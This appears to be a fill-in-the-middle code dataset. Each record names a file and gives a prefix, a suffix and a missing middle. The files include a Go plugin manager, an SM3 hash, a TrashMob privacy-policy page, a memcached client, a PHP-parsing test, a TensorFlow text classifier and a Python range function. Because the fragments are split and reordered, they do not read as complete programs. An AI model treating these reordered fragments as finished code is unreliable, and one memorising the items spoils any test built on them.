defer env.mutex.RUnlock()
for id := range env.activePlugins {
ids = append(ids, id)
}
return
}
// Returns true if the plugin is active, false otherwise.
func (env *Environment) IsPluginActive(pluginId string) bool {
env.mutex.RLock()
defer env.mutex.RUnlock()
for id := range env.activePlugins {
if id == pluginId {
return true
}
}
return false
}
// Activates the plugin with the given id.
func (env *Environment) ActivatePlugin(id string, onError func(error)) error {
env.mutex.Lock()
defer env.mutex.Unlock()
if !plugin.IsValidId(id) {
return fmt.Errorf("invalid plugin id: %s", id)
}
if _, ok := env.activePlugins[id]; ok {
return fmt.Errorf("plugin already active: %v", id)
}
plugins, err := ScanSearchPath(env.searchPath)
if err != nil {
return err
}
var bundle *model.BundleInfo
for _, p := range plugins {
if p.Manifest != nil && p.Manifest.Id == id {
if bundle != nil {
return fmt.Errorf("multiple plugins found: %v", id)
}
bundle = p
}
}
if bundle == nil {
return fmt.Errorf("plugin not found: %v", id)
}
activePlugin := ActivePlugin{BundleInfo: bundle}
var supervisor plugin.Supervisor
if bundle.Manifest.Backend != nil {
if env.apiProvider == nil {
return fmt.Errorf("env missing api provider, cannot activate plugin: %v", id)
}
supervisor, err = env.supervisorProvider(bundle)
if err != nil {
return errors.Wrapf(err, "unable to create supervisor for plugin: %v", id)
}
api, err := env.apiProvider(bundle.Manifest)
if err != nil {
return errors.Wrapf(err, "unable to get api for plugin: %v", id)
}
if err := supervisor.Start(api); err != nil {
return errors.Wrapf(err, "unable to start plugin: %v", id)
}
if onError != nil {
go func() {
err := supervisor.Wait()
if err != nil {
onError(err)
}
}()
}
activePlugin.Supervisor = supervisor
}
if bundle.Manifest.Webapp != nil {
if env.webappPath == "" {
if supervisor != nil {
supervisor.Stop()
}
return fmt.Errorf("env missing webapp path, cannot activate plugin: %v", id)
}
bundlePath := filepath.Clean(bundle.Manifest.Webapp.BundlePath)
if bundlePath == "" || bundlePath[0] == '.' {
return fmt.Errorf("invalid webapp bundle path")
}
bundlePath = filepath.Join(env.searchPath, id, bundlePath)
webappBundle, err := ioutil.ReadFile(bundlePath)
if err != nil {
// Backwards compatibility for plugins where webapp.bundle_path was ignored. This should
// be removed eventually.
if webappBundle2, err2 := ioutil.ReadFile(fmt.Sprintf("%s/%s/webapp/%s_bundle.js", env.searchPath, id, id)); err2 == nil {
webappBundle = webappBundle2
} else {
if supervisor != nil {
supervisor.Stop()
}
return errors.Wrapf(err, "unable to read webapp bundle: %v", id)
}
}
err = ioutil.WriteFile(fmt.Sprintf("%s/%s_bundle.js", env.webappPath, id), webappBundle, 0644)
if err != nil {
if supervisor != nil {
supervisor.Stop()
}
return errors.Wrapf(err, "unable to write webapp bundle: %v", id)
}
}
env.activePlugins[id] = activePlugin
return nil
}
// Deactivates the plugin with the given id.
func (env *Environment) DeactivatePlugin(id string) error {
env.mutex.Lock()
defer env.mutex.Unlock()
if activePlugin, ok := env.activePlugins[id]; !ok {
return fmt.Errorf("plugin not active: %v", id)
} else {
delete(env.activePlugins, id)
var err error
if activePlugin.Supervisor != nil {
err = activePlugin.Supervisor.Hooks().OnDeactivate()
if serr := activePlugin.Supervisor.Stop(); err == nil {
err = serr
}
}
return err
}
}
// Deactivates all plugins and gracefully shuts down the environment.
func (env *Environment) Shutdown() (errs []error) {
env.mutex.Lock()
defer env.mutex.Unlock()
for _, activePlugin := range env.activePlugins {
if activePlugin.Supervisor != nil {
if err := activePlugin.Supervisor.Hooks().OnDeactivate(); err != nil {
errs = append(errs, errors.Wrapf(err, "OnDeactivate() error for %v", activePlugin.BundleInfo.Manifest.Id))
}
if err := activePlugin.Supervisor.Stop(); err != nil {
errs = append(errs, errors.Wrapf(err, "error stopping supervisor for %v", activePlugin.BundleInfo.Manifest.Id))
}
}
}
env.activePlugins = make(map[string]ActivePlugin)
return
}
type MultiPluginHooks struct {
env *Environment
}
type SinglePluginHooks struct {
env *Environment
pluginId string
}
func (env *Environment) Hooks() *MultiPluginHooks {
return &MultiPluginHooks{
env: env,
}
}
func (env *Environment) HooksForPlugin(id string) *SinglePluginHooks {
return &SinglePluginHooks{
env: env,
pluginId: id,
}
}
func (h *MultiPluginHooks) invoke(f func(plugin.Hooks) error) (errs []error) {
h.env.mutex.RLock()
defer h.env.mutex.RUnlock()
for _, activePlugin := range h.env.activePlugins {
if activePlugin.Supervisor == nil {
continue
}
if err := f(activePlugin.Supervisor.Hooks()); err != nil {
errs = append(errs, errors.Wrapf(err, "hook error for %v", activePlugin.BundleInfo.Manifest.Id))
}
}
return
}
// OnConfigurationChange invokes the OnConfigurationChange hook for all plugins. Any errors
// encountered will be returned.
func (h *MultiPluginHooks) OnConfigurationChange() []error {
return h.invoke(func(hooks plugin.Hooks) error {
if err := hooks.OnConfigurationChange(); err != nil {
return errors.Wrapf(err, "error calling OnConfigurationChange hook")
}
return nil
})
}
// ServeHTTP invokes the ServeHTTP hook for the plugin identified by the request or responds with a
// 404 not found.
//
// It expects the request's context to have a plugin_id set.
func (h *MultiPluginHooks) ServeHTTP(w http.ResponseWriter, r *http.Request) {
if id := r.Context().Value("plugin_id"); id != nil {
if idstr, ok := id.(string); ok {
h.env.mutex.RLock()
defer h.env.mutex.RUnlock()
if plugin, ok := h.env.activePlugins[idstr]; ok && plugin.Supervisor != nil {
plugin.Supervisor.Hooks().ServeHTTP(w, r)
return
}
}
}
http.NotFound(w, r)
}
// MessageWillBePosted invokes the MessageWillBePosted hook for all plugins. Ordering
// is not guaranteed and the next plugin will get the previous one's modifications.
// if a plugin rejects a post, the rest of the plugins will not know that an attempt was made.
// Returns the final result post, or nil if the post was rejected and a string with a reason
// for the user the message was rejected.
func (h *MultiPluginHooks) MessageWillBePosted(post *model.Post) (*model.Post, string) {
h.env.mutex.RLock()
defer h.env.mutex.RUnlock()
for _, activePlugin := range h.env.activePlugins {
if activePlugin.Supervisor == nil {
continue
}
var rejectionReason string
post, rejectionReason = activePlugin.Supervisor.Hooks().MessageWillBePosted(post)
if post == nil {
return nil, rejectionReason
}
}
return post, ""
}
// MessageWillBeUpdated invokes the MessageWillBeUpdated hook for all plugins. Ordering
// is not guaranteed and the next plugin will get the previous one's modifications.
// if a plugin rejects a post, the rest of the plugins will not know that an attempt was made.
// Returns the final result post, or nil if the post was rejected and a string with a reason
// for the user the message was rejected.
func (h *MultiPluginHooks) MessageWillBeUpdated(newPost, oldPost *model.Post) (*model.Post, string) {
h.env.mutex.RLock()
defer h.env.mutex.RUnlock()
post := newPost
for _, activePlugin := range h.env.activePlugins {
if activePlugin.Supervisor == nil {
continue
}
var rejectionReason string
post, rejectionReason = activePlugin.Supervisor.Hooks().MessageWillBeUpdated(post, oldPost)
if post == nil {
return nil, rejectionReason
}
}
return post, ""
}
func (h *MultiPluginHooks) MessageHasBeenPosted(post *model.Post) {
h.invoke(func(hooks plugin.Hooks) error {
hooks.MessageHasBeenPosted(post)
return nil
})
}
func (h *MultiPluginHooks) MessageHasBeenUpdated(newPost, oldPost *model.Post) {
h.invoke(func(hooks plugin.Hooks) error {
hooks.MessageHasBeenUpdated(newPost, oldPost)
return nil
})
}
func (h *SinglePluginHooks) invoke(f func(plugin.Hooks) error) error {
h.env.mutex.RLock()
defer h.env.mutex.RUnlock()
if activePlugin, ok := h.env.activePlugins[h.pluginId]; ok && activePlugin.Supervisor != nil {
if err := f(activePlugin.Supervisor.Hooks()); err != nil {
return errors.Wrapf(err, "hook error for plugin: %v", activePlugin.BundleInfo.Manifest.Id)
}
return nil
}
return fmt.Errorf("unable to invoke hook for plugin: %v", h.pluginId)
}
// ExecuteCommand invokes the ExecuteCommand hook for the plugin.
func (h *SinglePluginHooks) ExecuteCommand(args *model.CommandArgs) (resp *model.CommandResponse, appErr *model.AppError, err error) {
err = h.invoke(func(hooks plugin.Hooks) error {
resp, appErr = hooks.ExecuteCommand(args)
return nil
})
return
} | env := &Environment{
activePlugins: make(map[string]ActivePlugin),
}
for _, opt := range options { |
sm3.go | package sm3
import (
"encoding/binary"
"hash"
)
type SM3 struct {
digest [8]uint32
length uint64
unhandleMsg []byte
}
func (sm3 *SM3) ff0(x, y, z uint32) uint32 { return x ^ y ^ z }
func (sm3 *SM3) ff1(x, y, z uint32) uint32 { return (x & y) | (x & z) | (y & z) }
func (sm3 *SM3) gg0(x, y, z uint32) uint32 { return x ^ y ^ z }
func (sm3 *SM3) gg1(x, y, z uint32) uint32 { return (x & y) | (^x & z) }
func (sm3 *SM3) p0(x uint32) uint32 { return x ^ sm3.leftRotate(x, 9) ^ sm3.leftRotate(x, 17) }
func (sm3 *SM3) p1(x uint32) uint32 { return x ^ sm3.leftRotate(x, 15) ^ sm3.leftRotate(x, 23) }
func (sm3 *SM3) leftRotate(x uint32, i uint32) uint32 { return (x<<(i%32) | x>>(32-i%32)) }
func (sm3 *SM3) pad() []byte {
msg := sm3.unhandleMsg
msg = append(msg, 0x80)
blockSize := 64
for len(msg)%blockSize != 56 {
msg = append(msg, 0x00)
}
msg = append(msg, uint8(sm3.length>>56&0xff))
msg = append(msg, uint8(sm3.length>>48&0xff))
msg = append(msg, uint8(sm3.length>>40&0xff))
msg = append(msg, uint8(sm3.length>>32&0xff))
msg = append(msg, uint8(sm3.length>>24&0xff))
msg = append(msg, uint8(sm3.length>>16&0xff))
msg = append(msg, uint8(sm3.length>>8&0xff))
msg = append(msg, uint8(sm3.length>>0&0xff))
if len(msg)%64 != 0 |
return msg
}
func (sm3 *SM3) update(msg []byte, nblocks int) {
var w [68]uint32
var w1 [64]uint32
a, b, c, d, e, f, g, h := sm3.digest[0], sm3.digest[1], sm3.digest[2], sm3.digest[3], sm3.digest[4], sm3.digest[5], sm3.digest[6], sm3.digest[7]
for len(msg) >= 64 {
for i := 0; i < 16; i++ {
w[i] = binary.BigEndian.Uint32(msg[4*i : 4*(i+1)])
}
for i := 16; i < 68; i++ {
w[i] = sm3.p1(w[i-16]^w[i-9]^sm3.leftRotate(w[i-3], 15)) ^ sm3.leftRotate(w[i-13], 7) ^ w[i-6]
}
for i := 0; i < 64; i++ {
w1[i] = w[i] ^ w[i+4]
}
A, B, C, D, E, F, G, H := a, b, c, d, e, f, g, h
for i := 0; i < 16; i++ {
SS1 := sm3.leftRotate(sm3.leftRotate(A, 12)+E+sm3.leftRotate(0x79cc4519, uint32(i)), 7)
SS2 := SS1 ^ sm3.leftRotate(A, 12)
TT1 := sm3.ff0(A, B, C) + D + SS2 + w1[i]
TT2 := sm3.gg0(E, F, G) + H + SS1 + w[i]
D = C
C = sm3.leftRotate(B, 9)
B = A
A = TT1
H = G
G = sm3.leftRotate(F, 19)
F = E
E = sm3.p0(TT2)
}
for i := 16; i < 64; i++ {
SS1 := sm3.leftRotate(sm3.leftRotate(A, 12)+E+sm3.leftRotate(0x7a879d8a, uint32(i)), 7)
SS2 := SS1 ^ sm3.leftRotate(A, 12)
TT1 := sm3.ff1(A, B, C) + D + SS2 + w1[i]
TT2 := sm3.gg1(E, F, G) + H + SS1 + w[i]
D = C
C = sm3.leftRotate(B, 9)
B = A
A = TT1
H = G
G = sm3.leftRotate(F, 19)
F = E
E = sm3.p0(TT2)
}
a ^= A
b ^= B
c ^= C
d ^= D
e ^= E
f ^= F
g ^= G
h ^= H
msg = msg[64:]
}
sm3.digest[0], sm3.digest[1], sm3.digest[2], sm3.digest[3], sm3.digest[4], sm3.digest[5], sm3.digest[6], sm3.digest[7] = a, b, c, d, e, f, g, h
}
func New() hash.Hash {
var sm3 SM3
sm3.Reset()
return &sm3
}
func (sm3 *SM3) BlockSize() int { return 64 }
func (sm3 *SM3) Size() int { return 32 }
func (sm3 *SM3) Reset() {
// Reset digest
sm3.digest[0] = 0x7380166f
sm3.digest[1] = 0x4914b2b9
sm3.digest[2] = 0x172442d7
sm3.digest[3] = 0xda8a0600
sm3.digest[4] = 0xa96f30bc
sm3.digest[5] = 0x163138aa
sm3.digest[6] = 0xe38dee4d
sm3.digest[7] = 0xb0fb0e4e
sm3.length = 0
sm3.unhandleMsg = []byte{}
}
func (sm3 *SM3) Write(p []byte) (int, error) {
toWrite := len(p)
sm3.length += uint64(len(p) * 8)
msg := append(sm3.unhandleMsg, p...)
nblocks := len(msg) / sm3.BlockSize()
sm3.update(msg, nblocks)
sm3.unhandleMsg = msg[nblocks*sm3.BlockSize():]
return toWrite, nil
}
func (sm3 *SM3) Sum(in []byte) []byte {
sm3.Write(in)
msg := sm3.pad()
sm3.update(msg, len(msg)/sm3.BlockSize())
needed := sm3.Size()
if cap(in)-len(in) < needed {
newIn := make([]byte, len(in), len(in)+needed)
copy(newIn, in)
in = newIn
}
out := in[len(in) : len(in)+needed]
for i := 0; i < 8; i++ {
binary.BigEndian.PutUint32(out[i*4:], sm3.digest[i])
}
return out
}
func Sm3Sum(data []byte) []byte {
var sm3 SM3
sm3.Reset()
sm3.Write(data)
return sm3.Sum(nil)
}
| {
panic("------SM3 Pad: error msgLen =")
} |
PrivacyPolicy.tsx | import * as React from 'react'
export const CurrentPrivacyPolicyVersion: PrivacyPolicyVersion = {
versionId: "0.3",
versionDate: new Date(2021, 5, 14, 0, 0, 0, 0)
}
export class PrivacyPolicyVersion {
versionId: string = "0.3";
versionDate: Date = new Date(2021, 5, 14, 0, 0, 0, 0);
}
// Note: this policy was generated by https://www.privacypolicygenerator.info/download.php?lang=en&token=IAx2sl4Q8Mslvuhn4tk2KRTSLHKa8LdG#
export const PrivacyPolicy: React.FC = () => {
return (
<div>
<h1>Privacy Policy for TrashMob</h1>
<p>At TrashMob, accessible from www.trashmob.eco, one of our main priorities is the privacy of our visitors. This Privacy Policy document contains types of information that is collected and recorded by TrashMob and how we use it.</p>
<p>If you have additional questions or require more information about our Privacy Policy, do not hesitate to contact us.</p>
<p>This Privacy Policy applies only to our online activities and is valid for visitors to our website with regards to the information that they shared and/or collect in TrashMob. This policy is not applicable to any information collected offline or via channels other than this website. Our Privacy Policy was created with the help of the <a href="https://www.privacypolicygenerator.org/">Free Privacy Policy Generator</a>.</p>
<h2>Consent</h2>
<p>By using our website, you hereby consent to our Privacy Policy and agree to its terms.</p>
<h2>Information we collect</h2>
<p>The personal information that you are asked to provide, and the reasons why you are asked to provide it, will be made clear to you at the point we ask you to provide your personal information.</p>
<p>If you contact us directly, we may receive additional information about you such as your name, email address, phone number, the contents of the message and/or attachments you may send us, and any other information you may choose to provide.</p>
<p>When you register for an Account, we may ask for your contact information, including items such as name, company name, address, email address, and telephone number.</p>
<h2>How we use your information</h2>
<p>We use the information we collect in various ways, including to:</p>
<ul>
<li>Provide, operate, and maintain our website</li>
<li>Improve, personalize, and expand our website</li>
<li>Understand and analyze how you use our website</li>
<li>Develop new products, services, features, and functionality</li>
<li>Communicate with you, either directly or through one of our partners, including for customer service, to provide you with updates and other information relating to the website, and for marketing and promotional purposes</li>
<li>Send you emails</li>
<li>Find and prevent fraud</li>
</ul>
<h2>Log Files</h2>
<p>TrashMob follows a standard procedure of using log files. These files log visitors when they visit websites. All hosting companies do this and a part of hosting services' analytics. The information collected by log files include internet protocol (IP) addresses, browser type, Internet Service Provider (ISP), date and time stamp, referring/exit pages, and possibly the number of clicks. These are not linked to any information that is personally identifiable. The purpose of the information is for analyzing trends, administering the site, tracking users' movement on the website, and gathering demographic information.</p>
<h2>Advertising Partners Privacy Policies</h2>
<p>You may consult this list to find the Privacy Policy for each of the advertising partners of TrashMob.</p>
<p>Third-party ad servers or ad networks uses technologies like cookies, JavaScript, or Web Beacons that are used in their respective advertisements and links that appear on TrashMob, which are sent directly to users' browser. They automatically receive your IP address when this occurs. These technologies are used to measure the effectiveness of their advertising campaigns and/or to personalize the advertising content that you see on websites that you visit.</p>
<p>Note that TrashMob has no access to or control over these cookies that are used by third-party advertisers.</p>
<h2>Third Party Privacy Policies</h2>
<p>TrashMob's Privacy Policy does not apply to other advertisers or websites. Thus, we are advising you to consult the respective Privacy Policies of these third-party ad servers for more detailed information. It may include their practices and instructions about how to opt-out of certain options. </p>
<p>You can choose to disable cookies through your individual browser options. To know more detailed information about cookie management with specific web browsers, it can be found at the browsers' respective websites.</p>
<h2>CCPA Privacy Rights (Do Not Sell My Personal Information)</h2>
<p>Under the CCPA, among other rights, California consumers have the right to:</p>
<p>Request that a business that collects a consumer's personal data disclose the categories and specific pieces of personal data that a business has collected about consumers.</p>
<p>Request that a business delete any personal data about the consumer that a business has collected.</p>
<p>Request that a business that sells a consumer's personal data, not sell the consumer's personal data.</p>
<p>If you make a request, we have one month to respond to you. If you would like to exercise any of these rights, please contact us.</p>
| <p>The right to access – You have the right to request copies of your personal data. We may charge you a small fee for this service.</p>
<p>The right to rectification – You have the right to request that we correct any information you believe is inaccurate. You also have the right to request that we complete the information you believe is incomplete.</p>
<p>The right to erasure – You have the right to request that we erase your personal data, under certain conditions.</p>
<p>The right to restrict processing – You have the right to request that we restrict the processing of your personal data, under certain conditions.</p>
<p>The right to object to processing – You have the right to object to our processing of your personal data, under certain conditions.</p>
<p>The right to data portability – You have the right to request that we transfer the data that we have collected to another organization, or directly to you, under certain conditions.</p>
<p>If you make a request, we have one month to respond to you. If you would like to exercise any of these rights, please contact us.</p>
<h2>Children's Information</h2>
<p>Another part of our priority is adding protection for children while using the internet. We encourage parents and guardians to observe, participate in, and/or monitor and guide their online activity.</p>
<p>TrashMob does not knowingly collect any Personal Identifiable Information from children under the age of 13. If you think that your child provided this kind of information on our website, we strongly encourage you to contact us immediately and we will do our best efforts to promptly remove such information from our records.</p>
</div>);
} | <h2>GDPR Data Protection Rights</h2>
<p>We would like to make sure you are fully aware of all of your data protection rights. Every user is entitled to the following:</p> |
client.go | package memcached
import (
"context"
"fmt"
"log"
"strings"
"sync"
"time"
"github.com/pkg/errors"
"github.com/serialx/hashring"
)
const connRequestQueueSize = 1000000
const (
defaultPort = 11211
defaultConnectTimeout = 1 * time.Second
defaultPollTimeout = 1 * time.Second
defaultTryReconnectPeriod = 60 * time.Second
defaultKeepAlivePeriod = 60 * time.Second
defaultMaxErrorCount = 100
)
// Client is the client of go-memcached.
type Client struct {
servers Servers
hashRing *hashring.HashRing
prefix string
connectTimeout time.Duration
pollTimeout time.Duration
tryReconnectPeriod time.Duration
keepAlivePeriod time.Duration
failover bool
maxOpen int // maximum amount of connection num. maxOpen <= 0 means unlimited.
maxLifetime time.Duration // maximum amount of time a connection may be reused
mu sync.RWMutex
cps map[string]*connectionPool
maxErrorCount int64
logf func(format string, params ...interface{})
}
// Servers are slice of Server.
type Servers []Server
func (ss *Servers) getNodeNames() []string {
nodes := make([]string, len(*ss))
for i, s := range *ss {
nodes[i] = s.getNodeName()
}
return nodes
}
// Server is the server's info of memcahced.
type Server struct {
Host string
Port int
Alias string
}
func (s *Server) getAddr() string {
port := s.Port
if port == 0 {
port = defaultPort
}
return fmt.Sprintf("%s:%d", s.Host, port)
}
func (s *Server) getNodeName() string {
if s.Alias == "" {
return s.getAddr()
}
return s.Alias
}
// New create Client
func | (servers Servers, prefix string) (cl *Client) {
cl = new(Client)
cl.servers = servers
cl.hashRing = hashring.New(cl.servers.getNodeNames())
cl.prefix = prefix
cl.connectTimeout = defaultConnectTimeout
cl.pollTimeout = defaultPollTimeout
cl.tryReconnectPeriod = defaultTryReconnectPeriod
cl.keepAlivePeriod = defaultKeepAlivePeriod
cl.maxErrorCount = defaultMaxErrorCount
cl.logf = log.Printf
cl.cps = make(map[string]*connectionPool, len(servers))
for i := range servers {
cl.cps[servers[i].getNodeName()] = cl.openConnectionPool(&servers[i])
}
return
}
func (cl *Client) openConnectionPool(server *Server) *connectionPool {
cp := new(connectionPool)
cp.cl = cl
cp.Server = server
cp.openerCh = make(chan struct{}, connRequestQueueSize)
cp.connRequests = make(map[uint64]chan connRequest)
go cp.opener()
return cp
}
// SetConnMaxLifetime sets the maximum amount of time a connection may be reused.
//
// Expired connections may be closed lazily before reuse.
//
// If d <= 0, connections are reused forever.
func (cl *Client) SetConnMaxLifetime(d time.Duration) {
if d < 0 {
d = 0
}
cl.mu.Lock()
defer cl.mu.Unlock()
cl.maxLifetime = d
// wake cleaner up when lifetime is shortened.
for node := range cl.cps {
cp := cl.cps[node]
if d > 0 && d < cl.maxLifetime && cp.cleanerCh != nil {
select {
case cp.cleanerCh <- struct{}{}:
default:
}
}
cp.startCleanerLocked()
}
}
// SetConnectTimeout sets the timeout of connect to memcached server.
func (cl *Client) SetConnectTimeout(timeout time.Duration) {
cl.mu.Lock()
defer cl.mu.Unlock()
cl.connectTimeout = timeout
}
// SetPollTimeout sets the timeout of polling from memcached server.
func (cl *Client) SetPollTimeout(timeout time.Duration) {
cl.mu.Lock()
defer cl.mu.Unlock()
cl.pollTimeout = timeout
}
// SetTryReconnectPeriod sets the period of trying reconnect.
func (cl *Client) SetTryReconnectPeriod(period time.Duration) {
cl.mu.Lock()
defer cl.mu.Unlock()
cl.tryReconnectPeriod = period
}
// SetMaxErrorCount sets the max of error count to close the connection pool.
func (cl *Client) SetMaxErrorCount(count int64) {
cl.mu.Lock()
defer cl.mu.Unlock()
cl.maxErrorCount = count
}
// SetKeepAlivePeriod sets the period of keep alive.
func (cl *Client) SetKeepAlivePeriod(period time.Duration) {
cl.mu.Lock()
defer cl.mu.Unlock()
cl.keepAlivePeriod = period
}
// SetConnMaxOpen sets the maximum amount of opening connections.
func (cl *Client) SetConnMaxOpen(maxOpen int) {
cl.mu.Lock()
defer cl.mu.Unlock()
cl.maxOpen = maxOpen
}
// SetFailover is used to specify whether to use the failover option.
func (cl *Client) SetFailover(failover bool) {
cl.mu.Lock()
defer cl.mu.Unlock()
cl.failover = failover
}
// SetLogger is used to set logger
func (cl *Client) SetLogger(logf func(format string, params ...interface{})) {
cl.mu.Lock()
defer cl.mu.Unlock()
cl.logf = logf
}
func (cl *Client) removePrefix(key string) string {
if len(cl.prefix) == 0 {
return key
}
if strings.HasPrefix(key, "?") {
return strings.Join([]string{"?", strings.Replace(key[1:], cl.prefix, "", 1)}, "")
}
return strings.Replace(key, cl.prefix, "", 1)
}
func (cl *Client) addPrefix(key string) string {
if len(cl.prefix) == 0 {
return key
}
if strings.HasPrefix(key, "?") {
return strings.Join([]string{"?", cl.prefix, key[1:]}, "")
}
return strings.Join([]string{cl.prefix, key}, "")
}
func (cl *Client) conn(keys ...string) (map[string]*conn, error) {
nodes := make([]string, 0, len(cl.cps))
if len(keys) == 0 {
for node := range cl.cps {
nodes = append(nodes, node)
}
m, err := cl._conn(context.Background(), nodes)
return m, errors.Wrap(err, "Failed _conn")
}
nodeMap := map[string]struct{}{}
for _, key := range keys {
if len(key) == 0 {
continue
}
rawkey := cl.addPrefix(key)
node, ok := cl.hashRing.GetNode(rawkey)
if !ok {
return map[string]*conn{}, errors.New("Failed GetNode")
}
nodeMap[node] = struct{}{}
}
for node := range nodeMap {
nodes = append(nodes, node)
}
m, err := cl._conn(context.Background(), nodes)
return m, errors.Wrap(err, "Failed _conn")
}
func (cl *Client) _conn(ctx context.Context, nodes []string) (map[string]*conn, error) {
var (
wg sync.WaitGroup
sm sync.Map
)
nl := len(nodes)
m := make(map[string]*conn, nl)
ec := make(chan error, nl)
for _, node := range nodes {
wg.Add(1)
go func(node string) {
defer wg.Done()
cp := cl.cps[node]
cp.mu.RLock()
closed := cp.closed
cp.mu.RUnlock()
if closed {
return
}
c, err := cp.conn(ctx)
if err != nil {
ec <- errors.Wrap(err, "Failed conn")
if cp.circuitBreaker(err) {
cl.removeNode(node)
cp.close()
go cl.tryReconnect()
}
}
sm.Store(node, c)
}(node)
}
wg.Wait()
close(ec)
for err := range ec {
if err != nil {
return m, err
}
}
sm.Range(func(key interface{}, value interface{}) bool {
k, ok := key.(string)
if !ok {
cl.logf("Unexpected key type: %T", key)
return false
}
c, ok := value.(*conn)
if !ok {
cl.logf("Unexpected value type: %T", value)
return false
}
m[k] = c
return true
})
return m, nil
}
func (cl *Client) putConn(m map[string]*conn, err error) {
for node, c := range m {
cp := cl.cps[node]
if err1 := cp.putConn(c, err); err1 != nil {
cl.logf("Failed putConn: %v", err)
}
}
}
func (cl *Client) addNode(node string) {
cl.mu.Lock()
defer cl.mu.Unlock()
cl.hashRing = cl.hashRing.AddNode(node)
}
func (cl *Client) removeNode(node string) {
cl.mu.Lock()
defer cl.mu.Unlock()
cl.hashRing = cl.hashRing.RemoveNode(node)
}
// Close closes all connectionPools and channels
func (cl *Client) Close() error {
cl.mu.Lock()
defer cl.mu.Unlock()
for node := range cl.cps {
if err := cl.cps[node].close(); err != nil {
cl.logf("Failed pool.close: %v", err)
}
}
return nil
}
func (cl *Client) tryReconnect() {
for {
time.Sleep(cl.tryReconnectPeriod)
closedPools := make(map[string]*connectionPool, len(cl.cps))
for node, cp := range cl.cps {
if cp.closed {
closedPools[node] = cp
}
}
if len(closedPools) == 0 {
return
}
var existsDeadConn bool
for node, cp := range closedPools {
if c, err := cp.newConn(); err == nil {
c.close()
cl.addNode(node)
cp.mu.Lock()
cp.closed = false
cp.openerCh = make(chan struct{}, connRequestQueueSize)
cp.mu.Unlock()
go cp.opener()
continue
}
existsDeadConn = true
}
if !existsDeadConn {
return
}
}
}
| New |
try_test.go | package analysis
import (
"testing"
"github.com/bradleyjkemp/cupaloy"
)
func TestCatchClause(t *testing.T) | {
data := []byte(`<?php
namespace App;
use Exception;
try {
} catch (\NotFoundException $ex) {
} catch (\HttpException | Exception $ex) {
} catch (\Throwable $ex) {
}`)
doc := NewDocument("test1", data)
doc.Load()
results := []*ClassAccess{}
tra := newTraverser()
tra.traverseDocument(doc, func(_ *traverser, symbol Symbol, _ []Symbol) {
if classAccess, ok := symbol.(*ClassAccess); ok {
results = append(results, classAccess)
}
})
cupaloy.SnapshotT(t, results)
} |
|
mcnn_model.py | import multiprocessing
import tensorflow as tf
from tensorflow.contrib import estimator
from tensorflow.contrib import lookup
from model import commons
|
def parse_csv_row(row):
columns = tf.decode_csv(row, record_defaults=commons.HEADER_DEFAULTS, field_delim='\t')
features = dict(zip(commons.HEADERS, columns))
target = features.pop(commons.LABEL_COL)
return features, tf.string_to_number(target, out_type=tf.int32)
def input_fn(file_name, batch_size=32, shuffle=False, repeat_count=1):
num_threads = multiprocessing.cpu_count()
data_set = tf.data.TextLineDataset(filenames=file_name).skip(1)
if shuffle:
data_set = data_set.shuffle(buffer_size=1000)
data_set = data_set.map(lambda row: parse_csv_row(row), num_parallel_calls=num_threads).batch(batch_size) \
.repeat(repeat_count).prefetch(1000)
iterator = data_set.make_one_shot_iterator()
features, target = iterator.get_next()
return features, target
def model_fn(features, labels, mode, params):
if mode == tf.estimator.ModeKeys.TRAIN:
tf.keras.backend.set_learning_phase(True)
else:
tf.keras.backend.set_learning_phase(False)
vocab_table = lookup.index_table_from_file(vocabulary_file='data/vocab.csv', num_oov_buckets=1, default_value=-1)
text = features[commons.FEATURE_COL]
words = tf.string_split(text)
dense_words = tf.sparse_tensor_to_dense(words, default_value=commons.PAD_WORD)
word_ids = vocab_table.lookup(dense_words)
padding = tf.constant([[0, 0], [0, commons.MAX_DOCUMENT_LENGTH]])
# Pad all the word_ids entries to the maximum document length
word_ids_padded = tf.pad(word_ids, padding)
word_id_vector = tf.slice(word_ids_padded, [0, 0], [-1, commons.MAX_DOCUMENT_LENGTH])
f1 = tf.keras.layers.Embedding(params.N_WORDS, 100, input_length=commons.MAX_DOCUMENT_LENGTH)(word_id_vector)
f2 = tf.keras.layers.Embedding(params.N_WORDS, 200, input_length=commons.MAX_DOCUMENT_LENGTH)(word_id_vector)
f3 = tf.keras.layers.Embedding(params.N_WORDS, 300, input_length=commons.MAX_DOCUMENT_LENGTH)(word_id_vector)
filter_sizes = [3, 5]
conv_pools = []
for text_embedding in [f1, f2, f3]:
for filter_size in filter_sizes:
l_zero = tf.keras.layers.ZeroPadding1D((filter_size - 1, filter_size - 1))(text_embedding)
l_conv = tf.keras.layers.Conv1D(filters=32, kernel_size=filter_size, padding='same', activation='tanh')(l_zero)
l_pool = tf.keras.layers.GlobalMaxPool1D()(l_conv)
conv_pools.append(l_pool)
merged = tf.keras.layers.Concatenate(axis=1)(conv_pools)
dense1 = tf.keras.layers.Dense(128, activation='relu', kernel_regularizer=tf.keras.regularizers.l2(0.01))(merged)
dense2 = tf.keras.layers.Dense(64, activation='relu', kernel_regularizer=tf.keras.regularizers.l2(0.01))(dense1)
logits = tf.keras.layers.Dense(1, activation=None)(dense2)
if labels is not None:
labels = tf.reshape(labels, [-1, 1])
optimizer = tf.train.AdamOptimizer()
def _train_op_fn(loss):
return optimizer.minimize(loss=loss, global_step=tf.train.get_global_step())
return head.create_estimator_spec(features=features, labels=labels, mode=mode, logits=logits,
train_op_fn=_train_op_fn)
def serving_fn():
receiver_tensor = {
commons.FEATURE_COL: tf.placeholder(dtype=tf.string, shape=None)
}
features = {
key: tensor
for key, tensor in receiver_tensor.items()
}
return tf.estimator.export.ServingInputReceiver(features, receiver_tensor) | __author__ = 'KKishore'
head = estimator.binary_classification_head() |
Largest_Range.py | array_to_analyze = [11,7,3,4,2,5,1,0]
def largestRange(array_to_analyze):
# create a dictionary / hash table to keep track if we've seen the number already
|
# all good
print(largestRange(array_to_analyze)) | elements = {x:0 for x in array_to_analyze} # set them all to "0"
#how many places have we moved to the left and right
left = 0
right = 0
#for each number
for entry in array_to_analyze:
#if the number has not been seen yet
if elements[entry] == 0:
left_count = entry-1 # start moving to the left
right_count = entry +1 # and the right
# if this left exists
while left_count in elements:
elements[left_count] = 1 # add it to the dictionary
left_count = left_count-1 #keep moving left if the previous number existed in the array
left_count = left_count +1
# if this right exists
while right_count in elements:
elements[right_count] = 1 # add it to the dictionary
right_count = right_count+1 #keep moving right if the previous number existed in the array
right_count = right_count -1
#if it doesn't exist, subtract 1 because we've added one to check a new number
#but it doesn't exist so we need to set it back to the very last number verified
#if there was any different from or we still stay at 0,0, return that sub-array
